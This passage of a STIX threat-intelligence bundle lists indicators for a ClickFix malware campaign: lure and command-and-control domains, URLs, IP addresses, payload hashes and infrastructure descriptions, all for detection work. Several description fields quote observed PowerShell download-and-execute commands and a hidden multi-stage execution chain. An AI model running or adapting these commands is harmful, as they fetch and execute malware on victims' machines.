      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'gettrumpmemes.gettrumpmemestrendingtokens.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6a90598d-2eda-4a45-9928-de4a0127b7c4",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--69bfbeee-1862-487b-b087-b43d894b46ad",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/*']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--5acb27f9-c34f-459f-826e-01a781650cc6",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a692.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--27191f7f-d686-4a58-937d-0ab4f6b2d868",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/39676ea0b0640b4db29d0f93845d702b3784985a.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--0e369376-c933-401f-bda3-2d52c6bc17a9",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab94.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--66de35a6-54d0-4ce4-a783-cd304e6c1071",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44a.svg']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--6799e6b4-56a0-4204-874d-0220b0e85773",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://ntdnewtds.shop/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--df8a5160-95f2-40ee-968a-fb77d3f4e262",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://ntdnewtds.shop/jsrepo/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--36bb8cf5-67ab-48c0-8f8e-de3e1351072a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.kamisisterbrofanydodf.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--145f5897-db17-444a-8ac4-596a85010f8a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.kamisisterbrofanydodf.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": " / MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810",
      "id": "indicator--bba01ec8-09b4-4b45-9839-49aa9e2794d0",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.MD5 = '51b46342163ef37f5f41c269ffb337d3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "compromised_site_redirector_fromcharcode / MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9",
      "id": "indicator--c21db930-ca9b-415f-b15e-7ca72f0f4c83",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.MD5 = '7c268bfab0653cdca45b4dc3c1ee0092']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": " / SHA1 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810",
      "id": "indicator--892e567a-7e3c-4c79-82fb-d43479c9defa",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-1' = '724a8445c5c3fd57778d82f62b9d4a6112a3bb2d']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "compromised_site_redirector_fromcharcode / SHA1 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9",
      "id": "indicator--9ac38a2c-47a8-45f3-b787-7fa8bd44a6c7",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-1' = 'f1542a7697e04865e1dfeeed084e5ea5870100f0']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "",
      "id": "indicator--56babd21-17c0-40c7-aa35-16a8d0c21746",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "",
      "id": "indicator--9f5f01e7-52a5-4698-aeb0-b0e00800b723",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "",
      "id": "indicator--952a3aef-a9f6-42fe-88ae-e4d3108ae35f",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "compromised_site_redirector_fromcharcode",
      "id": "indicator--7b666298-3fd5-4a19-bb97-e186932067c2",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:04:59.000Z",
      "description": "secondary payload download / Execution chain: WScript.exe \u2192 rundll32.exe (shell32.dll ShellExec_RunDLL) \u2192 PowerShell (Base64-encoded, hidden window) \u2192 downloads python312x64.zip (~14.5 MB) from https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIesRkVjDKsLLPGn3bfOiftAwlv4LtkdRlpJPaW4FoAJi5w \u2192 extracts to %APPDATA%\\Templates\\python312x64\\ \u2192 executes pythonw.exe with Protected.py",
      "id": "indicator--bc0c82d6-78d4-46b4-b4f5-5211dc4a162e",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-05-17T05:04:59.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIesRkVjDKsLLPGn3bfOiftAwlv4LtkdRlpJPaW4FoAJi5w']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:04:59.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "C2 Server Domain used in ClickFix campaigns / Omegatech SC:\nTimestamp\tPrefix\tAS Path\n2026-05-17 21:11:25\t178.16.53.0/24\tAS202412",
      "id": "indicator--a9fb2885-2ced-43f6-bffc-3e25dd70fec8",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'captioto.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "C2 Server Domain used in ClickFix campaigns / Omegatech SC:\nTimestamp\tPrefix\tAS Path\n2026-05-17 21:27:14\t178.16.53.0/24\tAS202412",
      "id": "indicator--aaeebea5-c6a2-4405-b16f-4f47aa944d10",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'cptoptious.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "C2 Server Domain used in ClickFix campaigns / Omegatech SC:\nTimestamp\tPrefix\tAS Path\n2026-05-17 21:43:04\t178.16.53.0/24\tAS202412\nDomain reported to registrar 2026-05-17",
      "id": "indicator--e4d987d5-8aea-4b61-b23b-0a791ec872fb",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'newtdsone.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--b333dc18-af92-4961-b9c5-b71b100ad399",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--2fe93e55-62c3-4841-933d-aca97e666c71",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/automail-insurtech-tax.de']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--2b5b531b-1724-4a0c-964d-0bc5d9e1c1a8",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://captioto.com/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--0a16e5d4-3962-4d3e-b7ce-d6a5deade0c5",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.captioto.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--7b927664-e4fc-40ac-8a2d-b00e09244e2f",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.captioto.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--fa029497-c922-41ae-9d8e-601a364cb1a6",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.cptoptious.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--7e851f21-8ce9-410e-9ade-5484401f9bb7",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/url=']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--b2b16a5d-3e31-40d7-9c47-c9f3da26e824",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/teamrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--5ab6588d-7397-4440-a963-5a58c833484b",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.cptoptious.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--731d1857-f08e-4a24-b03e-fa78985fbbd7",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://cptoptious.com/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--a45b82dc-7b83-44dc-8d10-01a58210997e",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://cptoptious.com/captcha.html']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--6b16164a-46e8-4d1e-971c-47554082e28a",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://cptoptious.com/captcha.htm']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--2d7d0ff9-d9a8-4940-9e85-8d36f7028b62",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.newtdsone.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--74e69086-8147-449d-a832-5f3f0d0c6131",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.newtdsone.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "CC=BG ASN=AS34368 (zonata - natskovi & sie ltd.). Stage-1 PowerShell download source in the Bryan affiliate chain (observed as powershell iex(irm('91.92.240.117'))).",
      "id": "indicator--b42da53d-df9d-4ca5-a0de-09b91c8cbd2e",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '91.92.240.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z",
      "valid_until": "2026-06-17T18:00:00.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "CC=BG ASN=AS34368 (zonata - natskovi & sie ltd.). Stage-2 download/Invoke-Expression source in the Bryan affiliate chain (observed as Invoke-WebRequest http://91.92.240.121; Invoke-Expression $result.Content, spawned by the 91.92.240.117 stage).",
      "id": "indicator--cfec54f3-b357-41c4-97a1-2d1778ba687f",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '91.92.240.121']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z",
      "valid_until": "2026-06-17T18:00:00.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--60cab142-70ce-4322-aa89-3c59864ad221",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://91.92.240.117/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--5f173597-57d6-4ab1-a404-104d506832a2",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://91.92.240.121/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--8cd9f389-f944-48ce-ad1b-91503a5cd209",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://bryanexhaust.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--9607e332-908e-458d-8b6a-700e46ecbcb6",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://sdntds.shop/teamrepo?rnd=0.3905751823084034&ts=1779127243826']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--3e470f18-8cd4-4a14-b260-0dea11907c21",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://sdntds.shop/teamrepo?rnd=0.5058000373016334']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--468dcbb9-3acd-4480-8ddb-74c073a33065",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'bryanexhaust.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--e58f52bc-35aa-41d3-bad0-790c83d9dfed",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'sdntds.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:59:17.000Z",
      "description": "Payload hash / collected from bryanexhaust.com",
      "id": "indicator--9f485729-6d5b-4065-9ca8-33e648acdccf",
      "labels": [],
      "modified": "2026-05-18T18:59:17.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.MD5 = 'c43c4bfd2e1a44ef690e6801be2b4099']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:59:17.000Z"
    },
    {
      "created": "2026-05-18T18:59:17.000Z",
      "description": "Payload hash / Collected from bryanexhaust.com",
      "id": "indicator--c47d5e9a-06a2-40e0-9dcc-909314c75cdb",
      "labels": [],
      "modified": "2026-05-18T18:59:17.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:59:17.000Z"
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--26a4ff55-cd69-4a45-a1e8-0ac4362588f3",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "captioto.com \u2014 Additional TDS C2",
      "description": "TDS C2 domain observed in OTX telemetry. Serves /jsrepo endpoint. Part of expanded TDS infrastructure pool.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "captioto",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--403e208a-e490-4d2a-aa67-5816a6ab0b73",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "cptoptious.com \u2014 Additional TDS C2",
      "description": "TDS C2 domain. Observed serving /jsrepo, /teamrepo, /captcha.html and /captcha.htm endpoints, plus a /url= path (URL parameter; redirect semantics not confirmed). Also linked to the automail-insurtech-tax.de path. Both http and https variants of the root and /jsrepo were observed, so detections should not be scheme-specific.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "cptoptious",
        "otx-enriched",
        "captcha-html"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--3ab7c58f-ae41-4889-a55d-aeda799089fd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "newtdsone.shop \u2014 Additional TDS C2",
      "description": "Additional .shop TLD TDS domain consistent with ntdnewtds.shop / dnsnewtds.shop naming pattern.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "newtdsone",
        "shop-tld",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--3200e47c-60be-457a-a251-a2dcd0732fb4",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "bryanexhaust.com \u2014 Associated domain",
      "description": "Domain associated with the cluster per OTX telemetry. A payload sample was collected from this domain (MD5 c43c4bfd2e1a44ef690e6801be2b4099 / SHA-256 4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5), which is the basis for the hosting-malware type. Whether the site is attacker-owned or a compromised third-party site used as a redirect/lure page is not established.",
      "infrastructure_types": [
        "hosting-malware"
      ],
      "labels": [
        "associated-domain",
        "otx-enriched",
        "bryanexhaust"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4928286b-2992-45fe-b9af-2ef98d9e820f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "gettrumpmemestrendingtokens.com \u2014 Crypto/Political lure domain",
      "description": "Lure domain used by the cluster. Hosts SVG image assets for fake CAPTCHA/lure pages. Crypto-political branding ('Trump meme tokens') used as social engineering hook \u2014 suggests the cluster targets beyond cannabis sector, using viral political/crypto content as lures.",
